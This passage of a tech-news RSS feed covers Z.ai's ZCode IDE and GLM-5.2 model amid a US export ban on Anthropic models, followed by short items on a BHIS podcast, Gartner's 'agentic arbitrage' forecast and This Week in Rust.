0.67x coefficient. The platform also supports multiple AI models and agents, including Claude Code, Codex, Gemini, and OpenCode — a pragmatic concession to the reality that no single model wins every task.</p><h2><b>GLM-5.2, the open-source model trained entirely on Chinese chips, powers the whole experience</b></h2><p>ZCode's value proposition is inseparable from <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>, the model it was designed to showcase. Z.ai released GLM-5.2 on June 16, first to its Coding Plan subscribers and subsequently as open-source weights under the MIT license on <a href="https://huggingface.co/zai-org/GLM-5">Hugging Face</a> — a sequencing decision that prioritized distribution over the traditional benchmark-led launch.</p><p>The model's specifications are formidable. GLM-5.2 is a 744-billion-parameter mixture-of-experts architecture with 40 billion active parameters, a genuine one-million-token context window — five times the 200K limit on its predecessor — and training on 28.5 trillion tokens. It ranked second globally on <a href="https://arena.ai/leaderboard/code/webdev">Code Arena </a>as of mid-June, trailing only Anthropic's Claude Fable 5, making it one of the highest-performing publicly available models for coding tasks.</p><p>Critically, the model was built entirely without American chips. As Decrypt reported, GLM-5.2 "<a href="https://decrypt.co/371613/china-z-ai-glm-5-2-model-rivals-claude-opus">runs entirely on Huawei silicon</a>." Stability AI founder Emad Mostaque estimated total training costs at roughly $25 million, with 80 percent spent on post-training — a figure that, if accurate, would make GLM-5.2 extraordinarily cheap relative to Western frontier models.</p><p>On benchmarks, <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a> performs within striking distance of the best proprietary systems. It trails Anthropic's Claude Opus 4.8 by just one percentage point on <a href="https://www.frontierswe.com/">FrontierSWE</a>, a benchmark measuring multi-hour autonomous engineering projects, while edging out OpenAI's <a href="https://openai.com/index/introducing-gpt-5-5/">GPT-5.5</a>. </p><p>Its API pricing — $1.40 per million input tokens and $4.40 per million output — are a cost reduction of up to 82 percent compared to Anthropic's Claude Opus 4.8 at $5 and $25, respectively. Because ZCode is a first-party tool from the same company that makes the model, it requires no manual endpoint configuration — the model is wired in.</p><h2><b>The Anthropic export ban gave Chinese AI its biggest opening yet</b></h2><p>ZCode's arrival cannot be separated from the geopolitical drama that has roiled the AI industry over the past three weeks. On June 12, the U.S. government, <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">citing national security authorities</a>, issued an export control directive suspending all access to Anthropic's Fable 5 and Mythos 5 models by any foreign national, whether inside or outside the United States, including foreign national Anthropic employees. Enterprise clients in finance, healthcare, SaaS, and critical infrastructure found their core intelligence services abruptly disabled, without exception, prior warning, or effective recourse.</p><p>While the Trump administration <a href="https://www.cnbc.com/2026/06/30/anthropic-says-trump-admin-has-lifted-export-controls-on-claude-fable-5-and-mythos-5.html">lifted those controls just yesterday</a> — Anthropic confirmed on June 30 that the Department of Commerce had rescinded the directive — the episode sent shockwaves through the developer community and accelerated interest in open-source, self-hostable alternatives. The government's crackdown on Anthropic coincided with a swift rise in Chinese open-source models that are proving to be almost as capable and significantly cheaper than some of the most powerful U.S. models.</p><p>Z.ai's timing was surgical. On the same day the Trump administration ordered Anthropic's most advanced models blocked for foreign nationals, Zhipu announced the <a href="https://z.ai/blog/glm-5.2">open-source release of GLM-5.2</a> with no usage restrictions. The <a href="https://www.scmp.com/tech/article/3343239/chinas-zhipu-ai-launches-new-major-model-glm-5-challenge-its-rivals">South China Morning Post reported </a>that GLM-5.2 would be available to all users of Zhipu's new GLM Coding Plan subscription, "priced at just a tenth of Anthropic's premium Claude Code and Claude Max tiers."</p><p>The market responded accordingly. Zhipu AI's market capitalization crossed HK$1 trillion (<a href="https://www.scmp.com/tech/article/3357858/zhipu-ai-market-cap-tops-hk1-trillion-shares-glm-52-developer-soar">US$128 billion</a>) on June 22, driven by a 42 percent intraday share surge. JPMorgan raised its 2026–2030 revenue forecast for Zhipu by between 7 and 16 percent following the launch, projecting an over 534 percent revenue surge for 2026 and expecting the AI firm to turn a profit by 2028.</p><h2><b>Why vendor lock-in now carries a geopolitical risk that no SLA can cover</b></h2><p>The <a href="https://venturebeat.com/technology/anthropic-is-bringing-back-claude-fable-5-globally-after-us-lifts-export-control-order-where-can-enterprises-access-it">Fable 5 episode</a> did more than embarrass Anthropic. It introduced a new risk category into enterprise AI procurement: sovereign access risk. When a government can disable a commercially deployed AI model overnight, the traditional evaluation criteria of developer experience, benchmark scores, and pricing become secondary to a more fundamental question: Will this tool still work tomorrow?</p><p>The event exposed the inadequacy of standard enterprise contract language. An investigation by <a href="https://www.fifthrow.com/blog/us-export-control-order-and-global-suspension-of-fable-5-mythos-5-operationalizing-compliance-as-a">FifthRow</a> found that almost all standard Data Processing Addenda, SaaS agreements, and procurement SLAs "relied on vague 'force majeure' or 'compliance with law' catch-alls, not on precise, actionable regulatory suspension or kill-switch clauses."</p><p>ZCode's <a href="https://aiidelist.com/ide/zcode">BYOK architecture </a>and <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>'s MIT-licensed open weights offer a partial answer. A development team can download the model, host it on its own infrastructure, and run ZCode against it without ever touching Z.ai's cloud — eliminating both American export-control risk and Chinese data-sovereignty concerns in a single move. The catch is that anyone using Z.ai's cloud API remains subject to Chinese law, a consideration that evaporates only with pure self-hosting.</p><p>Gartner analysts <a href="https://news.creeta.com/en/gartner-enterprise-ai-coding-agents-2026/">have warned</a> that governance, pricing, support, workflows, commercial maturity, and market durability matter as much as developer experience and model capabilities when evaluating coding agent vendors for enterprise-wide adoption. By that measure, ZCode faces a steep climb. It is not open source itself; Linux support remains in beta; and security reviewers have flagged the need for careful evaluation of its credential handling, particularly for remote development over SSH and messaging-platform-triggered tasks — an agent that can be summoned from WeChat involves access paths that should be mapped before trusting it with anything sensitive.</p><h2><b>Inside the $10 billion race where model labs are becoming full-stack IDE companies</b></h2><p><a href="https://zcode.z.ai/">ZCode</a> enters one of the most crowded and fastest-moving markets in enterprise software. Enterprise AI coding agents are capturing a growing share of enterprise software engineering spend, with the market estimated at roughly $9.8 billion to $11.0 billion annualized as of April 2026, according to <a href="https://enterprisedna.co/resources/news/gartner-enterprise-ai-coding-agents-10-billion-market-2026/">Gartner</a>. A defining shift this year, the analyst firm noted, is "the movement of frontier model providers into direct competition with application-layer vendors" — precisely the pattern ZCode embodies.</p><p>Gartner codified this evolution in May when it <a href="https://openai.com/index/gartner-2026-agentic-coding-leader/">renamed its annual Magic Quadrant</a> from "AI Code Assistants" to "Enterprise AI Coding Agents," defining the category as "autonomous or semiautonomous software engineering solutions that perceive context, translate human intent into multistep plans, and execute and verify those steps across code, tests and related engineering artifacts." The 2026 Magic Quadrant names Anthropic, Cursor, GitHub, and OpenAI as Leaders. Z.ai was not among the 12 vendors evaluated — an absence that underscores both the company's nascent enterprise sales presence outside China and the Western-centric lens through which the analyst community still views the market.</p><p>The competitive landscape is daunting. Cursor is the <a href="https://www.bloomberg.com/news/articles/2026-03-02/cursor-recurring-revenue-doubles-in-three-months-to-2-billion">$2 billion ARR IDE</a> that feels like VS Code with a supercharger. Claude Code reached <a href="https://www.anthropic.com/news/anthropic-raises-30-billion-series-g-funding-380-billion-post-money-valuation">approximately $2.5 billion</a> in annualized revenue by early 2026. Google relaunched <a href="https://blog.google/innovation-and-ai/technology/developers-tools/google-io-2026-developer-highlights/">Antigravity 2.0</a> at I/O in May, and Cognition retired the Windsurf brand, relaunching the IDE as <a href="https://devin.ai/desktop/">Devin Desktop</a> with the Agent Command Center as the default surface.</p><p>Against these entrenched players, ZCode's pitch rests on three pillars: deep first-party integration with GLM-5.2 that no third-party editor can replicate, aggressive pricing that starts at a fraction of Western competitors, and MIT-licensed open weights that allow enterprises to self-host — eliminating the regulatory kill-switch risk that the Fable ban made viscerally real.</p><h2><b>Z.ai's real challenge is turning a $128 billion valuation into a global developer tools business</b></h2><p><a href="http://z.ai/">Z.ai</a> controls the model (<a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>), the subscription layer (<a href="https://z.ai/subscribe">the GLM Coding Plan</a>), and the IDE (<a href="https://zcode.z.ai/">ZCode</a>) — a tightly coupled stack that optimizes for performance but concentrates switching costs. For the company, the business logic is clear. Its most reliable revenue stream has been on-premises deployments for Chinese government agencies, state-owned banks, and energy conglomerates. In full-year 2025, on-premises deployment revenue reached RMB 534 million, growing over 100 percent year-over-year and accounting for 73.7 percent of total revenue with a gross margin of 48.8 percent. ZCode and the GLM Coding Plan represent the company's bid to build a comparable revenue engine in cloud-based developer tools — globally, not just in China.</p><p>The early signals are encouraging for <a href="http://z.ai/">Z.ai</a>, if anecdotal. Community reception on X was enthusiastic, with one early user calling the tool "super stable" and others clamoring for more Coding Plan capacity. "Bro, can't snag your family's Coding Plan? When are you gonna stock up on more cards?" <a href="https://x.com/realchendahuang/status/2072361920976593163">one user wrote in Chinese</a>, suggesting demand is already outstripping supply.</p><p>But the hard questions loom large. Can a Chinese AI company build trust with Western enterprise buyers amid escalating technology tensions? Can ZCode's ecosystem mature fast enough to compete with Cursor's polished UX, Claude Code's deep agent primitives, and GitHub Copilot's unmatched distribution? And can Z.ai sustain a company valued at $128 billion while still losing money? </p><p>What is no longer in question is the competitive dynamic itself. Three weeks ago, a U.S. government directive proved that access to the world's best coding model can vanish overnight. Today, a Chinese lab is shipping a free IDE, an open-source model trained on zero American chips, and a subscription plan that costs less per month than a single lunch in Manhattan. The AI coding agent market did not just become global this summer. It became a market where the fallback option might be better than the thing it's falling back from — and that changes the calculus for every engineering leader choosing a toolchain in the second half of 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAAS Phishing Controls | BHIS - Talkin' Bout [infosec] News]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 1x - Views:4 🎧 Follow the Podcast - BHIS - Talkin' Bout [infosec] News https://bhisnews.transistor.fm
 
/// 🔗 Register for webcasts, summits, and workshops - 
https://poweredbybhis.com 
 
///Black Hills Infosec Socials
Twitter: https://twitter...]]></description>
<link>https://tsecurity.de/de/3640671/it-security-video/saas-phishing-controls-bhis-talkin-bout-infosec-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640671/it-security-video/saas-phishing-controls-bhis-talkin-bout-infosec-news/</guid>
<pubDate>Thu, 02 Jul 2026 11:32:33 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 1x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/SISkLJndxOg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>🎧 Follow the Podcast - BHIS - Talkin' Bout [infosec] News https://bhisnews.transistor.fm<br />
 <br />
/// 🔗 Register for webcasts, summits, and workshops - <br />
https://poweredbybhis.com <br />
 <br />
///Black Hills Infosec Socials<br />
Twitter: https://twitter.com/BHinfoSecurity<br />
Mastodon: https://infosec.exchange/@blackhillsinfosec<br />
LinkedIn: https://www.linkedin.com/company/antisyphon-training<br />
Discord: https://discord.gg/ffzdt3WUDe<br />
<br />
///Black Hills Infosec Shirts & Hoodies<br />
https://spearphish-general-store.myshopify.com/collections/bhis-shirt-collections<br />
<br />
///Black Hills Infosec Services<br />
Active SOC: https://www.blackhillsinfosec.com/services/active-soc/<br />
Penetration Testing: https://www.blackhillsinfosec.com/services/<br />
Incident Response: https://www.blackhillsinfosec.com/services/incident-response/<br />
<br />
///Backdoors & Breaches - Incident Response Card Game<br />
Backdoors & Breaches: https://www.backdoorsandbreaches.com/<br />
Play B&B Online: https://play.backdoorsandbreaches.com/<br />
<br />
///Antisyphon Training<br />
Pay What You Can: https://www.antisyphontraining.com/pay-what-you-can/<br />
Live Training: https://www.antisyphontraining.com/course-catalog/<br />
On Demand Training: https://www.antisyphontraining.com/on-demand-course-catalog/<br />
Antisyphon Discord: https://discord.gg/antisyphon<br />
Antisyphon Mastodon: https://infosec.exchange/@Antisy_Training<br />
<br />
///Educational Infosec Content<br />
Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/<br />
Wild West Hackin' Fest YouTube: https://www.youtube.com/wildwesthackinfest<br />
Antisyphon Training YouTube: https://www.youtube.com/antisyphontraining<br />
Active Countermeasures YouTube: https://youtube.com/activecountermeasures<br />
Threat Hunter Community Discord: https://discord.gg/threathunter<br />
<br />
Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[가트너 “에이전틱 AI에 SaaS 시장 재편…기존 업체는 위기, 서비스 기업은 기회”]]></title>
<description><![CDATA[가트너는 현재부터 2030년까지 최대 2,340억 달러(약 362조 원) 규모의 기업용 애플리케이션 지출이 ‘에이전틱 차익거래(Agentic arbitrage)’의 영향을 받을 것으로 전망했다. 이는 2030년 전체 기업용 애플리케이션 서비스형 소프트웨어(SaaS) 지출의 약 20%에 해당하는 규모다.



에이전틱 차익거래는 AI 에이전트가 여러 시스템을 넘나들며 업무를 수행하면서 사용자가 기존 소프트웨어 인터페이스를 직접 조작할 필요가 줄어드는 현상을 의미한다.



가트너 VP 애널리스트 조지 브로클허스트는 “에이전틱 A...]]></description>
<link>https://tsecurity.de/de/3640362/it-nachrichten/ai-saas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640362/it-nachrichten/ai-saas/</guid>
<pubDate>Thu, 02 Jul 2026 09:03:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>가트너는 현재부터 2030년까지 최대 2,340억 달러(약 362조 원) 규모의 기업용 애플리케이션 지출이 ‘에이전틱 차익거래(Agentic arbitrage)’의 영향을 받을 것으로 전망했다. 이는 2030년 전체 기업용 애플리케이션 서비스형 소프트웨어(SaaS) 지출의 약 20%에 해당하는 규모다.</p>



<p>에이전틱 차익거래는 AI 에이전트가 여러 시스템을 넘나들며 업무를 수행하면서 사용자가 기존 소프트웨어 인터페이스를 직접 조작할 필요가 줄어드는 현상을 의미한다.</p>



<p>가트너 VP 애널리스트 조지 브로클허스트는 “에이전틱 AI는 소프트웨어의 경제 구조 자체를 바꾸고 있다”라며 “에이전틱 시스템은 사용자 경험(UX) 중심의 기존 애플리케이션을 우회해 원하는 결과를 직접 제공함으로써 소프트웨어를 전면에 드러나지 않는 존재로 만들고 있다”라고 설명했다. 이어 “이 같은 변화는 많은 기업용 소프트웨어 공급업체에서 사용자 증가와 매출 성장 간의 연결고리를 약화시키고 있다”라고 밝혔다.</p>



<p>가트너는 이러한 변화가 이미 시작됐으며, 앞으로 소프트웨어 개발 방식과 가격 정책, 소비 방식 전반을 바꿀 것으로 내다봤다.</p>



<p>브로클허스트는 “이 현상은 기존 SaaS 생태계의 변화를 상징하는 ‘사스포칼립스(Saaspocalypse)’를 새로운 형태로 정의하게 될 것”이라며 “이는 SaaS의 종말이 아니라 진화에 가깝다. SaaS는 사라지는 것이 아니라 새로운 형태로 발전할 것이며, 이러한 변화는 기존 공급업체와 신규 사업자 모두에게 위협이자 기회가 될 것”이라고 말했다.</p>



<h2 class="wp-block-heading">기능보다 성과를 중시하는 기업 수요 확대</h2>



<p>가트너는 기업의 소프트웨어 구매 기준도 기능 중심에서 성과 중심으로 빠르게 이동하고 있다고 분석했다.</p>



<p>브로클허스트는 “기업은 더 이상 새로운 도구나 대시보드를 추가하는 데 집중하지 않는다”라며 “기업이 원하는 것은 더 나은 비즈니스 성과다. 하지만 AI 기능을 추가하는 것만으로는 성과 개선보다 비용 증가로 이어지는 경우가 많다”라고 설명했다.</p>



<p>이어 “AI를 통해 실질적인 성과를 얻으려면 기업의 축적된 지식과 고객 맥락을 지속적으로 유지할 수 있는 시스템이 필요하다”라고 덧붙였다.</p>



<p>일부 공급업체는 자율적인 엔드투엔드 워크플로와 시스템 간 오케스트레이션, 고객 맥락 및 지식 축적 기능을 지원하는 에이전틱 솔루션을 제공하고 있다. 가트너는 이러한 솔루션이 비즈니스 성과와 투자수익률(ROI) 향상에 기여할 수 있지만, 실제 구축 과정에서는 상당한 수준의 서비스 지원이 필요한 경우가 많다고 설명했다.</p>



<p>브로클허스트는 “조직이 에이전틱 AI 시스템을 적극 활용하게 되면 사용자 인터페이스(UI)는 더 이상 차별화 요소가 되기 어렵다”라며 “기존 SaaS 공급업체의 시장 점유율은 점차 잠식되고, 업종에 관계없이 활용 가능한 에이전틱 플랫폼을 제공하는 신규 사업자가 새로운 기회를 확보하게 될 것”이라고 전망했다.</p>



<h2 class="wp-block-heading">기존 SaaS 업체는 위기, 서비스 기업은 기회</h2>



<p>가트너는 기존 소프트웨어 공급업체가 경쟁력을 유지하기 위해서는 인터페이스 중심의 가치에서 성과 중심의 가치로 전환해야 한다고 제언했다. 또한 제품 실행 단계에 에이전틱 기능을 통합하고, 단순한 데이터 확보를 넘어 고객별 지식과 맥락을 지속적으로 축적·관리해야 한다고 밝혔다.</p>



<p>브로클허스트는 “이러한 변화는 기존 대시보드와 사용자 수 기반 비즈니스 모델에 의존하는 공급업체에는 위협이 될 수 있다”라며 “반면 서비스와 플랫폼을 기반으로 에이전틱 기능을 제공하고 도메인 간 워크플로를 지원하는 기업에는 새로운 수익 창출 기회가 될 것”이라고 설명했다.</p>



<p>가트너는 AI 기반 스타트업과 서비스 제공업체가 기업 시스템 전반에서 ‘에이전틱 레이어’ 역할을 수행할 것으로 전망했다. 이들은 단순한 기능 제공을 넘어 측정 가능한 성과를 창출하고, 기업이 AI 중심으로 업무 프로세스를 재설계할 수 있도록 지원할 것으로 예상된다.</p>



<p>브로클허스트는 “궁극적으로 이들 기업은 기존 소프트웨어 지출뿐 아니라 ROI 개선을 통해 새롭게 확보되는 추가 예산까지 흡수할 수 있을 것”이라고 밝혔다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[„Saaspocalypse“: Gartner warnt vor Agentic Arbitrage]]></title>
<description><![CDATA[Gartner rechnet damit, dass klassische SaaS-Lizenzmodelle durch autonome KI-Agenten massiv unter Druck geraten.

Tags: #Gartner | #Künstliche Intelligenz | #SaaS]]></description>
<link>https://tsecurity.de/de/3640290/it-security-nachrichten/saaspocalypse-gartner-warnt-vor-agentic-arbitrage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640290/it-security-nachrichten/saaspocalypse-gartner-warnt-vor-agentic-arbitrage/</guid>
<pubDate>Thu, 02 Jul 2026 08:08:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2023/11/SaaS-1920-Shutterstock-1980899387.jpg" class="attachment-full size-full wp-post-image" alt="SaaS" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2023/11/SaaS-1920-Shutterstock-1980899387.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2023/11/SaaS-1920-Shutterstock-1980899387-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2023/11/SaaS-1920-Shutterstock-1980899387-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2023/11/SaaS-1920-Shutterstock-1980899387-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2023/11/SaaS-1920-Shutterstock-1980899387-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title='"Saaspocalypse": Gartner warnt vor Agentic Arbitrage 1'></p>
    Gartner rechnet damit, dass klassische SaaS-Lizenzmodelle durch autonome KI-Agenten massiv unter Druck geraten.

<p>Tags: <a href="https://www.it-daily.net/thema/gartner-en">#Gartner</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a> | <a href="https://www.it-daily.net/thema/saas">#SaaS</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 658]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3640170/tools/this-week-in-rust-this-week-in-rust-658/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640170/tools/this-week-in-rust-this-week-in-rust-658/</guid>
<pubDate>Thu, 02 Jul 2026 07:10:00 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/06/30/Rust-1.96.1/">Announcing Rust 1.96.1 | Rust Blog</a></li>
<li><a href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/">The many journeys of learning Rust | Rust Blog</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#foundation">Foundation</a></h5>
<ul>
<li><a href="https://rustfoundation.org/media/rust-foundation-trusted-training-program-launches-giving-learners-a-mark-of-quality-to-trust/">Rust Foundation Trusted Training Program Launches, Giving Learners a Mark of Quality to Trust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://scientificcomputing.rs/monthly/2026-06">Scientific Computing in Rust #19 (June 2026)</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://slint.dev/blog/slint-1.17-released">Slint 1.17 Released</a></li>
<li><a href="https://blog.antoyo.xyz/rustc_codegen_gcc-progress-report-42">rustc_codegen_gcc: Progress Report #42</a></li>
<li><a href="https://hovinen.me/announcements/2026/06/24/introducing-test-that.html">Introducing Test That!</a></li>
<li><a href="https://hovinen.me/announcements/2026/06/24/introducing-test-that.html">Introducing Test That!: A rich test assertion library for Rust from the original author of GoogleTest Rust</a></li>
<li><a href="https://github.com/shihuili1218/rssh/blob/main/docs/article_arch_en.md">Inside RSSH: one Rust crate, three binaries, and the Tauri lessons along the way</a></li>
<li><a href="https://github.com/Aleixenandros/Rustty/releases/tag/v1.38.0">Rustty 1.38 – accessibility &amp; keyboard nav</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/06/25/guardiandb-0-17-0-secure-namespaces-iroh-1-0-and-the-arrival-of-the-odm/">GuardianDB 0.17.0: Secure namespaces, Iroh 1.0, and the arrival of the ODM</a></li>
<li><a href="https://dev.to/iam_suriyan_b9078a5b3a553/building-a-real-time-voice-agent-runtime-in-rust-no-gil-one-binary-2000-calls-a-box-12ko">Building a real-time voice-agent runtime in Rust: no GIL, one binary, 2,000 calls a box</a></li>
<li><a href="https://aimdb.dev/blog/aimdb-bring-your-own-connector">AimDB: Bring Your Own Connector</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.8.0">kache 0.8.0: zero-copy restores on Windows (ReFS)</a></li>
<li><a href="https://miskibin.github.io/warbell/">Warbell — a castle-defense action-RPG built with Bevy 0.19</a></li>
<li><a href="https://dev.to/gregorymc86/i-built-a-macos-ftp-client-entirely-in-rust-no-electron-no-webview-2a8i">I built a macOS FTP client entirely in Rust - no Electron, no webview</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://blog.yoshuawuyts.com/hoisting-expressions">Hoisting Expressions</a></li>
<li><a href="https://blog.jetbrains.com/rust/2026/06/25/rust-web-development-2026/">The Unglamorous Side of Rust Web Development</a></li>
<li><a href="https://dev.to/ernesto_arias_148b35bc25d/-how-i-found-out-52-of-my-knowledge-graph-was-duplicates-and-what-i-did-about-it-3coh">How I Found Out 52% of My Knowledge Graph Was Duplicates (and What I Did About It)</a></li>
<li><a href="https://jtjlehi.github.io/2026/06/25/novel-rust-error-handling.html">A Novel Approach to Rust Error Handling</a></li>
<li><a href="https://encore.dev/blog/redis-runtime">We put a Redis server inside our runtime</a></li>
<li><a href="https://kerkour.com/rust-high-performance-memory-fragmentation-allocations">High-performance Rust: Understanding and eliminating memory fragmentation</a></li>
<li><a href="https://kunobi.ninja/blog/kache-storage-worktrees">AI and worktrees are filling our disks: kache storage, measured</a></li>
<li><a href="https://dev.to/sicklefire/designing-a-cross-platform-terminal-memory-visualizer-in-rust-2365">Designing a cross-platform terminal memory visualizer in Rust</a></li>
<li><a href="https://pranitha.dev/posts/rust-and-memory-allocators">Your Rust Service Isn't Leaking — It Could Be the Allocator</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://medium.com/@vbasky/measure-dont-guess-building-viser-a-content-adaptive-video-encoding-optimizer-in-rust-7675edd6943a">Measure, Don't Guess: Building viser, a Content-Adaptive Video Encoding Optimizer in Rust</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-sql-and-sqlx-by-building-a-book-library-cli-in-rust/">Learn SQL and SQLx by Building a Book Library CLI in Rust</a></li>
<li>[series] <a href="https://aibodh.com/posts/async-rust-chapter-2-what-async-fn-compiles-into/">Reasoning About Async Rust with State Machines</a></li>
<li><a href="https://mainmatter.com/c-to-rust-migration-book/">The C to Rust Migration Book</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/pbkx/deconvolution">deconvolution</a>, a image deconvolution and restoration library.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1621">pbkx</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>
<p><a href="https://github.com/kmolan/multicalc-rust/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22">multicalc - good first issues</a></p>



<ul>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/93">AimDB - Add minimal example: hello-single-latest</a></li>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/109">AimDB - Wire <code>.transform()</code> and <code>.transform_join()</code> into stage profiling</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/1">edid-info - Increase test coverage with real EDID data</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/2">edid-info - Finalize CTA-861 extension implementation</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/3">edid-info - Support additional EDID extension block types</a></li>
</ul>
